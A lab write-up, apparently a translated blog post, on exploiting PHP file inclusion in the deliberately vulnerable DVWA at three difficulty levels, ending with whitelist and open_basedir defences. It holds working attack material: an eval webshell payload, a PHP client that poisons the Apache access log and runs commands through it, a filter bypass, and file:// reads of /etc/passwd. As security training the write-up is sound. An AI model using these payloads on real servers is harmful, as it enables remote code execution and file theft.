DVWA vulnerability range - File Inclusion, and the PHP open_basedir directory restriction setting

Basic knowledge:

The PHP functions that usually trigger a file inclusion vulnerability are the following four:

  1. include()
  2. include_once()
  3. require()
  4. require_once()

   require_once() and include_once() behave like require() and include(), except that if the file has already been included they will not include it again, which avoids function redefinitions, variable reassignment and similar problems. (The other difference: include() only emits a warning when the file cannot be loaded, while require() stops the script with a fatal error.)

In php.ini, allow_url_fopen is On by default; allow_url_include was added in PHP 5.2 and defaults to Off.

Classification:

Local file inclusion:

  Opening and including files on the local file system.

Remote file inclusion:

  Only possible when both allow_url_fopen = On and allow_url_include = On; only then can a file be included from a remote URL.

 

1. Low level

Looking at the source code, the incoming page parameter is passed straight to include(), without any filtering.

1. Local file inclusion

I built DVWA on Windows, created a new flag.txt on drive D, and included it by passing its path in the page parameter.

In a real engagement we usually do not know the directory layout, so instead we can include the web server logs at their default locations:

windows: apache/logs/access.log  apache/logs/error.log

linux: /var/log/apache/access.log  /var/log/apache2/access.log  /var/log/apache/access_log  /var/www/logs/access_log  /var/log/access_log

Each of these has a corresponding error.log as well.

Exploiting the inclusion through the web log:

localhost/dvwa/vulnerabilities/fi/?page=<?php @eval($_POST['shell']);?>

Note that the browser URL-encodes special characters such as < and >, so the encoded form is what gets written to the log and the payload never executes. Capture the request in Burp Suite, decode the parameter back to the raw characters, and forward it.

The log then records this request, so the log file now contains the one-line webshell; including the log through the page parameter executes it.

SSH logs can also be poisoned and included in a variety of ways; the default SSH log location is /var/log/auth.log.
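The same log-poisoning steps as a small PHP CLI client, added here as an example (it is not code from the original post or from DVWA). It writes the request over a raw TCP socket so nothing URL-encodes the payload on the way out, then includes the poisoned log and posts a command to the one-line shell. The host, port, DVWA path, session cookie and the relative log path (an XAMPP-style layout) are assumptions for a local lab.

```php
<?php
// Added example, not DVWA or the original post's code. Host, port, DVWA path,
// session cookie and log path are lab assumptions; adjust them to your setup.

$host    = '127.0.0.1';
$port    = 80;
$base    = '/dvwa/vulnerabilities/fi/';
// The FI page needs a logged-in DVWA session; paste your own PHPSESSID here.
$cookie  = 'security=low; PHPSESSID=REPLACE_WITH_YOUR_SESSION_ID';
// Path from vulnerabilities/fi/ up to the Apache log (assumed XAMPP layout:
// C:\xampp\htdocs\dvwa\vulnerabilities\fi -> C:\xampp\apache\logs).
$logPath = '../../../../apache/logs/access.log';

// The one-line shell exactly as it must land in the log. A browser would send
// it as %3C%3Fphp%20..., which PHP then includes as harmless text.
$payload = "<?php @eval(\$_POST['shell']); ?>";

// Step 1: build the request line by hand, with no urlencode()/rawurlencode(),
// so the raw "<?php" reaches Apache and is written to access.log as-is.
function build_poison_request(string $base, string $payload, string $host, string $cookie): string
{
    return "GET {$base}?page={$payload} HTTP/1.1\r\n"
         . "Host: {$host}\r\n"
         . "Cookie: {$cookie}\r\n"
         . "Connection: close\r\n\r\n";
}

$sock = stream_socket_client("tcp://{$host}:{$port}", $errno, $errstr, 5);
if ($sock === false) {
    exit("connect failed: {$errstr} ({$errno})\n");
}
fwrite($sock, build_poison_request($base, $payload, $host, $cookie));
fclose($sock);

// Step 2: include the poisoned log through the vulnerable page parameter and
// send PHP code in the POST field the shell reads. $logPath is encoded here
// because it is a path, not the payload; PHP decodes it before include().
function run_shell(string $host, int $port, string $base, string $logPath, string $cookie, string $phpCode): string
{
    $ctx = stream_context_create(['http' => [
        'method'        => 'POST',
        'header'        => "Cookie: {$cookie}\r\n"
                         . "Content-Type: application/x-www-form-urlencoded\r\n",
        'content'       => http_build_query(['shell' => $phpCode]),
        'ignore_errors' => true,   // keep the body even on a non-2xx status
    ]]);
    $url = "http://{$host}:{$port}{$base}?page=" . rawurlencode($logPath);
    return (string) file_get_contents($url, false, $ctx);
}

echo run_shell($host, $port, $base, $logPath, $cookie, 'system("whoami");');
```

Two things to keep in mind when running it. The space inside `<?php @eval` makes the request line non-standard; if the server refuses it, a space-free form such as `<?=@eval($_POST['shell']);?>` lands in the log with the same effect. And because include() runs the whole log file, the response carries every logged line plus the command output, and each later inclusion of the log re-executes the shell until the log is rotated.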

2. Remote file inclusion

Conditions for inclusion over HTTP: allow_url_fopen = On and allow_url_include = On (the latter is Off by default).

http://localhost/dvwa/vulnerabilities/fi/?page=http://www.baidu.com

 

 

2. Medium level

View source

str_replace() is used to replace http:// and https:// with an empty string.

A filter built on str_replace() makes a single pass and never re-scans its own output, so it can be bypassed by doubling the string: the inner match is removed and the characters around it re-form the protocol prefix.

http://localhost/dvwa/vulnerabilities/fi/?page=hthttp://tp://www.baidu.com

The inclusion succeeds.
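The medium-level filtering pattern and its bypass, reproduced as a stand-alone PHP script so the behaviour can be checked from the command line. This is an added example, not DVWA's own source file; the strict reject-based check at the end is my addition and is one possible fix, not DVWA's.

```php
<?php
// Added example, not DVWA's own file: the medium-level filtering pattern the
// post describes, reproduced as a function so the bypass can be checked from
// the command line (php medium_filter.php).

function medium_filter(string $page): string
{
    // str_replace() makes one left-to-right pass per search string and never
    // re-scans its own output, so removing one match can create a new one.
    return str_replace(['http://', 'https://'], '', $page);
}

// Reject-based alternative (added here, not DVWA's code): refuse anything that
// starts with a URL scheme (http, https, file, php, data, ...) or contains
// traversal, instead of trying to strip it. Nothing is "cleaned", so there is
// nothing left over to re-form into a prefix.
function medium_filter_strict(string $page): bool
{
    if (preg_match('#^[a-z][a-z0-9+.\-]*://#i', $page)) {
        return false;                       // any scheme://
    }
    if (strpos($page, '..') !== false) {
        return false;                       // ../ or ..\ traversal
    }
    return true;
}

$inputs = [
    'http://www.baidu.com',           // stripped to www.baidu.com: remote include fails
    'hthttp://tp://www.baidu.com',    // inner http:// removed, outer one re-formed
    'htthttps://ps://www.baidu.com',  // same trick against the https:// rule
    'file1.php',                      // legitimate page
];
foreach ($inputs as $in) {
    printf("%-32s after str_replace: %-24s strict filter: %s\n",
        $in, medium_filter($in), medium_filter_strict($in) ? 'allowed' : 'rejected');
}
```

Running it shows `hthttp://tp://www.baidu.com` coming out of str_replace() as `http://www.baidu.com`, which is exactly what include() then fetches; the strict filter rejects all three URL forms because the doubled string still begins with `something://`. Even so, rejecting bad input is a stop-gap; the whitelist approach in the summary is the real fix.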

 

 

3. High level

View source

The incoming page parameter is required to begin with "file", so the file:// protocol wrapper, which also starts with "file", can still be used to read arbitrary files.
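A "must start with file" check of the kind the high level uses, with the inputs that pass and fail it, as an added example rather than DVWA's actual source. The candidate paths are assumptions for illustration; the script creates a temporary file of its own to stand in for flag.txt so it runs on any host.

```php
<?php
// Added example, not DVWA's own file: a "must start with file" check of the
// kind used at the high level, and why the file:// wrapper passes it.

function high_filter(string $page): bool
{
    // Shell-style glob: "file*" only constrains the first four characters.
    return fnmatch('file*', $page);
}

$candidates = [
    'file1.php',               // intended use
    '../../../../etc/passwd',  // blocked: does not start with "file"
    'http://www.baidu.com',    // blocked
    'file:///etc/passwd',      // allowed: the file:// wrapper starts with "file"
    'file:///C:/flag.txt',     // allowed: Windows spelling of the same trick
];
foreach ($candidates as $c) {
    printf("%-26s %s\n", $c, high_filter($c) ? 'allowed' : 'blocked');
}

// file:// is just another spelling of a local path, so include() opens it like
// any other file and allow_url_include is irrelevant. A constructed temp file
// stands in for flag.txt so the script runs on any host.
$tmp = tempnam(sys_get_temp_dir(), 'fi');
file_put_contents($tmp, "contents of flag.txt\n");
$viaWrapper = 'file:///' . ltrim(str_replace('\\', '/', $tmp), '/');

echo "\n{$viaWrapper}: ", high_filter($viaWrapper) ? 'allowed' : 'blocked', "\n";
include $viaWrapper;   // prints "contents of flag.txt"
unlink($tmp);
```

The last three lines are the whole high-level bypass in miniature: the glob is satisfied by the scheme name, and PHP's file:// wrapper needs no allow_url_* setting because it never leaves the local disk.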

 

To sum up

Whitelist filtering: let the page parameter select from a fixed list of known files, and never pass the raw parameter to include().

open_basedir, the PHP directory restriction setting

open_basedir limits the files the running script can access to the designated directories, so even an unfiltered include cannot reach logs or system files outside them.
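A hardened page loader that applies both countermeasures from the summary, added as an example (not DVWA's code). The file names, the directories in the php.ini and vhost comments, and the log path used for the check are assumptions chosen to resemble a DVWA layout.

```php
<?php
// Added example, not DVWA code: a hardened page loader that applies the two
// countermeasures from the summary. File names and directories are lab
// assumptions chosen to resemble the DVWA layout.

// 1. Whitelist. The request parameter selects a key, never a path; the only
//    strings that ever reach include() are the fixed values on the right.
const PAGES = [
    'file1' => 'file1.php',
    'file2' => 'file2.php',
    'file3' => 'file3.php',
];

function load_page(string $param): bool
{
    if (!array_key_exists($param, PAGES)) {
        http_response_code(404);
        echo 'ERROR: File not found!';
        return false;
    }
    include __DIR__ . DIRECTORY_SEPARATOR . PAGES[$param];
    return true;
}

// 2. open_basedir. Confine all file access of this script to its own tree.
//    Normally this is set globally rather than in code, for example:
//      php.ini:        open_basedir = "C:/xampp/htdocs/dvwa/"
//      Apache vhost:   php_admin_value open_basedir /var/www/html/dvwa/
//    and paired with  allow_url_include = Off  (the default) so the remote
//    form of the bug is closed at the same time. ini_set() can only tighten
//    an existing open_basedir, never relax it. The trailing separator matters:
//    without it the value is a plain prefix match.
ini_set('open_basedir', __DIR__ . DIRECTORY_SEPARATOR);

// With the restriction active, paths outside the allowed tree fail with
// "open_basedir restriction in effect" instead of being read, so even an
// unfiltered include of a log file would get nothing. (Assumed Linux path.)
$outside = '/var/log/apache2/access.log';
echo @file_get_contents($outside) === false
    ? "log is unreadable under open_basedir\n"
    : "log is readable, restriction not in effect\n";

load_page($_GET['page'] ?? 'file1');
```

The two layers are independent: the whitelist removes the vulnerability from the application, and open_basedir limits the damage if another include() elsewhere on the server is still unfiltered. Setting open_basedir in php.ini or the vhost is preferable to ini_set(), since the runtime call only takes effect after the script has started and can be forgotten in other entry points.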

 


Source: www.cnblogs.com/ktfsong/p/11271282.html